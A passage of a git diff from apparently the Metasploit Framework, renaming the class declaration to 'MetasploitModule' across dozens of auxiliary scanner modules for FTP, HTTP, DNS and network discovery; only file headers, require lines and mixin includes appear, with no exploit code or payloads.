b/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Ipv6 include Msf::Exploit::Remote::Capture diff --git a/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb b/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb index 08e6967dfe..2920350cf9 100644 --- a/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb +++ b/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Capture include Msf::Exploit::Remote::Ipv6 diff --git a/modules/auxiliary/scanner/discovery/udp_probe.rb b/modules/auxiliary/scanner/discovery/udp_probe.rb index 152f3c7374..95363cd2b8 100644 --- a/modules/auxiliary/scanner/discovery/udp_probe.rb +++ b/modules/auxiliary/scanner/discovery/udp_probe.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'openssl' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/discovery/udp_sweep.rb b/modules/auxiliary/scanner/discovery/udp_sweep.rb index e8222d1e05..df8b24781e 100644 --- a/modules/auxiliary/scanner/discovery/udp_sweep.rb +++ b/modules/auxiliary/scanner/discovery/udp_sweep.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'openssl' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/dlsw/dlsw_leak_capture.rb b/modules/auxiliary/scanner/dlsw/dlsw_leak_capture.rb index 21e6d9ffb1..9490798336 100644 --- a/modules/auxiliary/scanner/dlsw/dlsw_leak_capture.rb +++ b/modules/auxiliary/scanner/dlsw/dlsw_leak_capture.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'socket' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/dns/dns_amp.rb b/modules/auxiliary/scanner/dns/dns_amp.rb index 4b448dca11..a914489225 100644 --- a/modules/auxiliary/scanner/dns/dns_amp.rb +++ b/modules/auxiliary/scanner/dns/dns_amp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Capture diff --git a/modules/auxiliary/scanner/elasticsearch/indices_enum.rb b/modules/auxiliary/scanner/elasticsearch/indices_enum.rb index 0fc0fd14c0..50b9b0af01 100644 --- a/modules/auxiliary/scanner/elasticsearch/indices_enum.rb +++ b/modules/auxiliary/scanner/elasticsearch/indices_enum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/emc/alphastor_devicemanager.rb b/modules/auxiliary/scanner/emc/alphastor_devicemanager.rb index 98234fe2f9..89645436c3 100644 --- a/modules/auxiliary/scanner/emc/alphastor_devicemanager.rb +++ b/modules/auxiliary/scanner/emc/alphastor_devicemanager.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/emc/alphastor_librarymanager.rb b/modules/auxiliary/scanner/emc/alphastor_librarymanager.rb index 57e3e108e0..4570b9ab79 100644 --- a/modules/auxiliary/scanner/emc/alphastor_librarymanager.rb +++ b/modules/auxiliary/scanner/emc/alphastor_librarymanager.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/finger/finger_users.rb b/modules/auxiliary/scanner/finger/finger_users.rb index e95315b367..66f081533c 100644 --- a/modules/auxiliary/scanner/finger/finger_users.rb +++ b/modules/auxiliary/scanner/finger/finger_users.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/ftp/anonymous.rb b/modules/auxiliary/scanner/ftp/anonymous.rb index 8af1e9cf16..faeed16eb4 100644 --- a/modules/auxiliary/scanner/ftp/anonymous.rb +++ b/modules/auxiliary/scanner/ftp/anonymous.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb b/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb index 4970ab3c62..33b9c7c7a2 100644 --- a/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb +++ b/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/ftp/ftp_login.rb b/modules/auxiliary/scanner/ftp/ftp_login.rb index 676ea23753..2ee8ac7b82 100644 --- a/modules/auxiliary/scanner/ftp/ftp_login.rb +++ b/modules/auxiliary/scanner/ftp/ftp_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/ftp' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/ftp/ftp_version.rb b/modules/auxiliary/scanner/ftp/ftp_version.rb index e922b36249..60cb5e1ec6 100644 --- a/modules/auxiliary/scanner/ftp/ftp_version.rb +++ b/modules/auxiliary/scanner/ftp/ftp_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/ftp/konica_ftp_traversal.rb b/modules/auxiliary/scanner/ftp/konica_ftp_traversal.rb index deceef291b..29163236d5 100644 --- a/modules/auxiliary/scanner/ftp/konica_ftp_traversal.rb +++ b/modules/auxiliary/scanner/ftp/konica_ftp_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/ftp/pcman_ftp_traversal.rb b/modules/auxiliary/scanner/ftp/pcman_ftp_traversal.rb index bcdb39565b..6743f9008f 100644 --- a/modules/auxiliary/scanner/ftp/pcman_ftp_traversal.rb +++ b/modules/auxiliary/scanner/ftp/pcman_ftp_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb b/modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb index c29b0bb930..fd22f8a66b 100644 --- a/modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb +++ b/modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/h323/h323_version.rb b/modules/auxiliary/scanner/h323/h323_version.rb index 56008ba45a..bded8208c7 100644 --- a/modules/auxiliary/scanner/h323/h323_version.rb +++ b/modules/auxiliary/scanner/h323/h323_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/a10networks_ax_directory_traversal.rb b/modules/auxiliary/scanner/http/a10networks_ax_directory_traversal.rb index 82e6fbb881..1a83f8a512 100644 --- a/modules/auxiliary/scanner/http/a10networks_ax_directory_traversal.rb +++ b/modules/auxiliary/scanner/http/a10networks_ax_directory_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/accellion_fta_statecode_file_read.rb b/modules/auxiliary/scanner/http/accellion_fta_statecode_file_read.rb index bb63c2a7d3..af7ce9b7a4 100644 --- a/modules/auxiliary/scanner/http/accellion_fta_statecode_file_read.rb +++ b/modules/auxiliary/scanner/http/accellion_fta_statecode_file_read.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/adobe_xml_inject.rb b/modules/auxiliary/scanner/http/adobe_xml_inject.rb index e801a16c18..0b4fd6e2ea 100644 --- a/modules/auxiliary/scanner/http/adobe_xml_inject.rb +++ b/modules/auxiliary/scanner/http/adobe_xml_inject.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/allegro_rompager_misfortune_cookie.rb b/modules/auxiliary/scanner/http/allegro_rompager_misfortune_cookie.rb index ab1cdd947e..eb22d9335e 100644 --- a/modules/auxiliary/scanner/http/allegro_rompager_misfortune_cookie.rb +++ b/modules/auxiliary/scanner/http/allegro_rompager_misfortune_cookie.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/apache_activemq_source_disclosure.rb b/modules/auxiliary/scanner/http/apache_activemq_source_disclosure.rb index b5d88ff665..4bb3bece15 100644 --- a/modules/auxiliary/scanner/http/apache_activemq_source_disclosure.rb +++ b/modules/auxiliary/scanner/http/apache_activemq_source_disclosure.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/apache_activemq_traversal.rb b/modules/auxiliary/scanner/http/apache_activemq_traversal.rb index fff6aa5d95..a5b43f7e2c 100644 --- a/modules/auxiliary/scanner/http/apache_activemq_traversal.rb +++ b/modules/auxiliary/scanner/http/apache_activemq_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb b/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb index d7add8ec02..6324d1152b 100644 --- a/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb +++ b/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/apache_userdir_enum.rb b/modules/auxiliary/scanner/http/apache_userdir_enum.rb index 483f7acb5d..2b4711af17 100644 --- a/modules/auxiliary/scanner/http/apache_userdir_enum.rb +++ b/modules/auxiliary/scanner/http/apache_userdir_enum.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/appletv_login.rb b/modules/auxiliary/scanner/http/appletv_login.rb index d2c30f1bf1..16265f428e 100644 --- a/modules/auxiliary/scanner/http/appletv_login.rb +++ b/modules/auxiliary/scanner/http/appletv_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/http' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb b/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb index 78ee78a383..00f2f307f0 100644 --- a/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb +++ b/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/axis_local_file_include.rb b/modules/auxiliary/scanner/http/axis_local_file_include.rb index c4c029987c..a788774b35 100644 --- a/modules/auxiliary/scanner/http/axis_local_file_include.rb +++ b/modules/auxiliary/scanner/http/axis_local_file_include.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/axis_login.rb b/modules/auxiliary/scanner/http/axis_login.rb index c806a5df43..cd70c330f3 100644 --- a/modules/auxiliary/scanner/http/axis_login.rb +++ b/modules/auxiliary/scanner/http/axis_login.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'metasploit/framework/login_scanner/axis2' require 'metasploit/framework/credential_collection' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/http/backup_file.rb b/modules/auxiliary/scanner/http/backup_file.rb index 3ac0d740bb..226d7f4f90 100644 --- a/modules/auxiliary/scanner/http/backup_file.rb +++ b/modules/auxiliary/scanner/http/backup_file.rb @@ -8,7 +8,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanFile diff --git a/modules/auxiliary/scanner/http/barracuda_directory_traversal.rb b/modules/auxiliary/scanner/http/barracuda_directory_traversal.rb index af42fa9fa9..15bee576e6 100644 --- a/modules/auxiliary/scanner/http/barracuda_directory_traversal.rb +++ b/modules/auxiliary/scanner/http/barracuda_directory_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb b/modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb index dbaf72cd7e..baa635fe7e 100644 --- a/modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb +++ b/modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/blind_sql_query.rb b/modules/auxiliary/scanner/http/blind_sql_query.rb index 4903073c2a..8ef7274949 100644 --- a/modules/auxiliary/scanner/http/blind_sql_query.rb +++ b/modules/auxiliary/scanner/http/blind_sql_query.rb @@ -9,7 +9,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanUniqueQuery diff --git a/modules/auxiliary/scanner/http/bmc_trackit_passwd_reset.rb b/modules/auxiliary/scanner/http/bmc_trackit_passwd_reset.rb index b24065de3a..f484a2a75f 100644 --- a/modules/auxiliary/scanner/http/bmc_trackit_passwd_reset.rb +++ b/modules/auxiliary/scanner/http/bmc_trackit_passwd_reset.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/brute_dirs.rb b/modules/auxiliary/scanner/http/brute_dirs.rb index 5ffdf2bbdf..e2ecbafdbf 100644 --- a/modules/auxiliary/scanner/http/brute_dirs.rb +++ b/modules/auxiliary/scanner/http/brute_dirs.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'enumerable' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanDir diff --git a/modules/auxiliary/scanner/http/buffalo_login.rb b/modules/auxiliary/scanner/http/buffalo_login.rb index 26d643853f..8b9aaed703 100644 --- a/modules/auxiliary/scanner/http/buffalo_login.rb +++ b/modules/auxiliary/scanner/http/buffalo_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/buffalo' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/caidao_bruteforce_login.rb b/modules/auxiliary/scanner/http/caidao_bruteforce_login.rb index b3fb9cfa82..8fba970602 100644 --- a/modules/auxiliary/scanner/http/caidao_bruteforce_login.rb +++ b/modules/auxiliary/scanner/http/caidao_bruteforce_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/caidao' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/canon_wireless.rb b/modules/auxiliary/scanner/http/canon_wireless.rb index b9e1cdbf7b..971536a302 100644 --- a/modules/auxiliary/scanner/http/canon_wireless.rb +++ b/modules/auxiliary/scanner/http/canon_wireless.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'nokogiri' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/cert.rb b/modules/auxiliary/scanner/http/cert.rb index 167bb24fc9..414f9c391b 100644 --- a/modules/auxiliary/scanner/http/cert.rb +++ b/modules/auxiliary/scanner/http/cert.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::WmapScanSSL diff --git a/modules/auxiliary/scanner/http/chef_webui_login.rb b/modules/auxiliary/scanner/http/chef_webui_login.rb index e8abdfe8f7..13ec9b5784 100644 --- a/modules/auxiliary/scanner/http/chef_webui_login.rb +++ b/modules/auxiliary/scanner/http/chef_webui_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/login_scanner/chef_webui' require 'metasploit/framework/credential_collection' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/http/chromecast_webserver.rb b/modules/auxiliary/scanner/http/chromecast_webserver.rb index 5ac407a826..35c1f1af47 100644 --- a/modules/auxiliary/scanner/http/chromecast_webserver.rb +++ b/modules/auxiliary/scanner/http/chromecast_webserver.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/cisco_asa_asdm.rb b/modules/auxiliary/scanner/http/cisco_asa_asdm.rb index 8fa9b4f428..6dca2a3812 100644 --- a/modules/auxiliary/scanner/http/cisco_asa_asdm.rb +++ b/modules/auxiliary/scanner/http/cisco_asa_asdm.rb @@ -6,7 +6,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/cisco_device_manager.rb b/modules/auxiliary/scanner/http/cisco_device_manager.rb index 55d0033399..fe3ca21873 100644 --- a/modules/auxiliary/scanner/http/cisco_device_manager.rb +++ b/modules/auxiliary/scanner/http/cisco_device_manager.rb @@ -8,7 +8,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb b/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb index de6c042743..f1442e9410 100644 --- a/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb +++ b/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb @@ -8,7 +8,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/cisco_ironport_enum.rb b/modules/auxiliary/scanner/http/cisco_ironport_enum.rb index cf49d589a8..4bed3c6cf5 100644 --- a/modules/auxiliary/scanner/http/cisco_ironport_enum.rb +++ b/modules/auxiliary/scanner/http/cisco_ironport_enum.rb @@ -6,7 +6,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/cisco_nac_manager_traversal.rb b/modules/auxiliary/scanner/http/cisco_nac_manager_traversal.rb index 7f16552941..42e31918dc 100644 --- a/modules/auxiliary/scanner/http/cisco_nac_manager_traversal.rb +++ b/modules/auxiliary/scanner/http/cisco_nac_manager_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb b/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb index 1f8fc7fd14..97aef41367 100644 --- a/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb +++ b/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb @@ -6,7 +6,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/cisco_ssl_vpn_priv_esc.rb b/modules/auxiliary/scanner/http/cisco_ssl_vpn_priv_esc.rb index 166a48eba2..31fa2d011b 100644 --- a/modules/auxiliary/scanner/http/cisco_ssl_vpn_priv_esc.rb +++ b/modules/auxiliary/scanner/http/cisco_ssl_vpn_priv_esc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/clansphere_traversal.rb b/modules/auxiliary/scanner/http/clansphere_traversal.rb index 3878ced5cd..4f48e3a7a8 100644 --- a/modules/auxiliary/scanner/http/clansphere_traversal.rb +++ b/modules/auxiliary/scanner/http/clansphere_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb b/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb index c7517d32f1..5fd71d7fbc 100644 --- a/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb +++ b/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/coldfusion_version.rb b/modules/auxiliary/scanner/http/coldfusion_version.rb index b27972d810..c24e425ffa 100644 --- a/modules/auxiliary/scanner/http/coldfusion_version.rb +++ b/modules/auxiliary/scanner/http/coldfusion_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/concrete5_member_list.rb b/modules/auxiliary/scanner/http/concrete5_member_list.rb index 15d9170e91..1198f3b850 100644 --- a/modules/auxiliary/scanner/http/concrete5_member_list.rb +++ b/modules/auxiliary/scanner/http/concrete5_member_list.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/copy_of_file.rb b/modules/auxiliary/scanner/http/copy_of_file.rb index 27d2ea545c..e528752cf4 100644 --- a/modules/auxiliary/scanner/http/copy_of_file.rb +++ b/modules/auxiliary/scanner/http/copy_of_file.rb @@ -8,7 +8,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanFile diff --git a/modules/auxiliary/scanner/http/crawler.rb b/modules/auxiliary/scanner/http/crawler.rb index ac9ac083f0..b3854ca22b 100644 --- a/modules/auxiliary/scanner/http/crawler.rb +++ b/modules/auxiliary/scanner/http/crawler.rb @@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::HttpCrawler diff --git a/modules/auxiliary/scanner/http/dell_idrac.rb b/modules/auxiliary/scanner/http/dell_idrac.rb index 0bbc7ecf82..7d60b0886b 100644 --- a/modules/auxiliary/scanner/http/dell_idrac.rb +++ b/modules/auxiliary/scanner/http/dell_idrac.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/http/dir_listing.rb b/modules/auxiliary/scanner/http/dir_listing.rb index b759eb9fc3..609ab232b9 100644 --- a/modules/auxiliary/scanner/http/dir_listing.rb +++ b/modules/auxiliary/scanner/http/dir_listing.rb @@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanDir diff --git a/modules/auxiliary/scanner/http/dir_scanner.rb b/modules/auxiliary/scanner/http/dir_scanner.rb index 4c2263dba7..2ac59737ac 100644 --- a/modules/auxiliary/scanner/http/dir_scanner.rb +++ b/modules/auxiliary/scanner/http/dir_scanner.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'thread' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanDir diff --git a/modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb b/modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb index 36f44b069b..e5ef0dc135 100644 --- a/modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb +++ b/modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb @@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanDir diff --git a/modules/auxiliary/scanner/http/dlink_dir_300_615_http_login.rb b/modules/auxiliary/scanner/http/dlink_dir_300_615_http_login.rb index a64f3b8a87..cd5d8c4308 100644 --- a/modules/auxiliary/scanner/http/dlink_dir_300_615_http_login.rb +++ b/modules/auxiliary/scanner/http/dlink_dir_300_615_http_login.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class 